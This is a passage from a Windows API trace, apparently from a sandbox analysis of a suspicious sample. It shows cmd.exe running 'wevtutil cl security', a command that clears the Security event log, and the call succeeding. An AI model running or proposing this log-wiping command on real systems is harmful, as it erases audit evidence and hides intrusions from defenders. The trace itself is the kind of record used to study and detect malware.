lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x0, lpData=0x450ed0c*=0x1, lpcbData=0x450ed08*=0x1000) returned 0x2 [0094.241] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x4, lpData=0x450ed0c*=0x0, lpcbData=0x450ed08*=0x4) returned 0x0 [0094.242] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x4, lpData=0x450ed0c*=0x40, lpcbData=0x450ed08*=0x4) returned 0x0 [0094.242] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x4, lpData=0x450ed0c*=0x40, lpcbData=0x450ed08*=0x4) returned 0x0 [0094.242] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x0, lpData=0x450ed0c*=0x40, lpcbData=0x450ed08*=0x1000) returned 0x2 [0094.242] RegCloseKey (hKey=0x94) returned 0x0 [0094.242] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x450ed00 | out: phkResult=0x450ed00*=0x94) returned 0x0 [0094.242] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x0, lpData=0x450ed0c*=0x40, lpcbData=0x450ed08*=0x1000) returned 0x2 [0094.242] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x4, lpData=0x450ed0c*=0x1, lpcbData=0x450ed08*=0x4) returned 0x0 [0094.242] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x0, lpData=0x450ed0c*=0x1, lpcbData=0x450ed08*=0x1000) returned 0x2 [0094.242] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x4, lpData=0x450ed0c*=0x0, lpcbData=0x450ed08*=0x4) returned 0x0 [0094.242] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x4, lpData=0x450ed0c*=0x9, lpcbData=0x450ed08*=0x4) returned 0x0 [0094.242] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x4, lpData=0x450ed0c*=0x9, lpcbData=0x450ed08*=0x4) returned 0x0 [0094.242] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x450ed04, lpData=0x450ed0c, lpcbData=0x450ed08*=0x1000 | out: lpType=0x450ed04*=0x0, lpData=0x450ed0c*=0x9, lpcbData=0x450ed08*=0x1000) returned 0x2 [0094.242] RegCloseKey (hKey=0x94) returned 0x0 [0094.242] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2980f [0094.242] srand (_Seed=0x5ad2980f) [0094.242] GetCommandLineW () returned="/c wevtutil cl security" [0094.242] GetCommandLineW () returned="/c wevtutil cl security" [0094.242] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0094.242] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4559cb0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0094.242] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0094.242] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.242] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.242] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0094.242] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0094.242] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0094.243] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0094.243] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0094.243] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0094.243] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0094.243] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0094.243] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0094.243] GetEnvironmentStringsW () returned 0x4557d58* [0094.243] FreeEnvironmentStringsA (penv="A") returned 1 [0094.243] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.243] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.243] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0094.243] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0094.243] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0094.243] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0094.243] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0094.243] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0094.243] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0094.243] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0094.243] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x450fad8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0094.244] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x450fad8, lpFilePart=0x450fad0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x450fad0*="Desktop") returned 0x1d [0094.244] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0094.244] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x450f858 | out: lpFindFileData=0x450f858) returned 0x45505c8 [0094.244] FindClose (in: hFindFile=0x45505c8 | out: hFindFile=0x45505c8) returned 1 [0094.244] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x450f858 | out: lpFindFileData=0x450f858) returned 0x45505c8 [0094.244] FindClose (in: hFindFile=0x45505c8 | out: hFindFile=0x45505c8) returned 1 [0094.244] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0094.244] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x450f858 | out: lpFindFileData=0x450f858) returned 0x45505c8 [0094.244] FindClose (in: hFindFile=0x45505c8 | out: hFindFile=0x45505c8) returned 1 [0094.244] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0094.245] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0094.245] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0094.245] GetEnvironmentStringsW () returned 0x4557d58* [0094.245] FreeEnvironmentStringsA (penv="=") returned 1 [0094.245] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0094.245] GetConsoleOutputCP () returned 0x1b5 [0094.245] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0094.245] GetUserDefaultLCID () returned 0x409 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x450fc08, cchData=128 | out: lpLCData="0") returned 2 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x450fc08, cchData=128 | out: lpLCData="0") returned 2 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x450fc08, cchData=128 | out: lpLCData="1") returned 2 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0094.246] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0094.246] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0094.247] GetConsoleTitleW (in: lpConsoleTitle=0x455a9d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.247] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0094.247] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0094.247] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0094.247] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0094.248] _wcsicmp (_String1="wevtutil", _String2=")") returned 78 [0094.248] _wcsicmp (_String1="FOR", _String2="wevtutil") returned -17 [0094.248] _wcsicmp (_String1="FOR/?", _String2="wevtutil") returned -17 [0094.248] _wcsicmp (_String1="IF", _String2="wevtutil") returned -14 [0094.248] _wcsicmp (_String1="IF/?", _String2="wevtutil") returned -14 [0094.248] _wcsicmp (_String1="REM", _String2="wevtutil") returned -5 [0094.248] _wcsicmp (_String1="REM/?", _String2="wevtutil") returned -5 [0094.249] GetConsoleTitleW (in: lpConsoleTitle=0x450f8f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.250] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0094.250] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0094.250] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0094.250] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0094.250] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0094.250] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0094.250] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0094.250] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0094.250] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0094.250] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0094.250] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0094.250] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0094.250] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0094.250] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0094.250] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0094.250] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0094.250] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0094.250] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0094.250] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0094.250] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0094.250] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0094.250] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0094.250] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0094.250] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0094.250] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0094.250] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0094.250] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0094.250] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0094.250] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0094.250] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0094.250] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0094.250] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0094.250] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0094.250] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0094.250] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0094.250] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0094.250] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0094.250] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0094.250] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0094.250] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0094.250] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0094.250] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0094.251] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0094.251] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0094.251] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0094.251] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0094.251] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0094.251] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0094.251] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0094.251] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0094.251] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0094.251] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0094.251] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0094.251] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0094.251] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0094.251] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0094.251] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0094.251] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0094.251] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0094.251] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0094.251] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0094.251] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0094.251] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0094.251] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0094.251] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0094.251] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0094.251] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0094.251] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0094.251] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0094.251] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0094.251] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0094.251] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0094.251] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0094.251] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0094.251] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0094.251] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0094.251] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0094.251] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0094.251] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0094.251] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0094.251] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0094.251] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0094.251] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0094.251] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0094.251] _wcsicmp (_String1="wevtutil", _String2="FOR") returned 17 [0094.251] _wcsicmp (_String1="wevtutil", _String2="IF") returned 14 [0094.252] _wcsicmp (_String1="wevtutil", _String2="REM") returned 5 [0094.252] _wcsnicmp (_String1="wevt", _String2="cmd ", _MaxCount=0x4) returned 20 [0094.252] SetErrorMode (uMode=0x0) returned 0x0 [0094.252] SetErrorMode (uMode=0x1) returned 0x0 [0094.252] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x455af08, lpFilePart=0x450f3fc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x450f3fc*="Desktop") returned 0x1d [0094.252] SetErrorMode (uMode=0x0) returned 0x1 [0094.252] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0094.252] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0094.259] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.260] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.260] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x450f188, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450f188) returned 0xffffffff [0094.261] GetLastError () returned 0x2 [0094.261] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.261] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x450f188, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450f188) returned 0xffffffff [0094.261] GetLastError () returned 0x2 [0094.261] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.261] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x450f188, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450f188) returned 0x455b2a8 [0094.261] FindClose (in: hFindFile=0x455b2a8 | out: hFindFile=0x455b2a8) returned 1 [0094.261] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.COM", fInfoLevelId=0x1, lpFindFileData=0x450f188, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450f188) returned 0xffffffff [0094.261] GetLastError () returned 0x2 [0094.261] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.EXE", fInfoLevelId=0x1, lpFindFileData=0x450f188, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x450f188) returned 0x455b2a8 [0094.262] FindClose (in: hFindFile=0x455b2a8 | out: hFindFile=0x455b2a8) returned 1 [0094.262] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0094.262] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0094.262] GetConsoleTitleW (in: lpConsoleTitle=0x450f67c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.262] InitializeProcThreadAttributeList (in: lpAttributeList=0x450f5a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x450f58c | out: lpAttributeList=0x450f5a8, lpSize=0x450f58c) returned 1 [0094.262] UpdateProcThreadAttribute (in: lpAttributeList=0x450f5a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x450f594, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x450f5a8, lpPreviousValue=0x0) returned 1 [0094.262] GetStartupInfoW (in: lpStartupInfo=0x450f5e0 | out: lpStartupInfo=0x450f5e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0094.262] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0094.263] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0094.263] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0094.264] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil cl security", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x450f530*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil cl security", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x450f57c | out: lpCommandLine="wevtutil cl security", lpProcessInformation=0x450f57c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x758, dwThreadId=0xb0c)) returned 1 [0094.271] CloseHandle (hObject=0xa4) returned 1 [0094.271] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0094.271] GetEnvironmentStringsW () returned 0x4559ec0* [0094.271] FreeEnvironmentStringsA (penv="=") returned 1 [0094.271] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0094.854] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x450f514 | out: lpExitCode=0x450f514*=0x0) returned 1 [0094.854] CloseHandle (hObject=0xa8) returned 1 [0094.854] _vsnwprintf (in: _Buffer=0x450f5fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x450f51c | out: _Buffer="00000000") returned 8 [0094.854] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0094.854] GetEnvironmentStringsW () returned 0x4557d58* [0094.854] 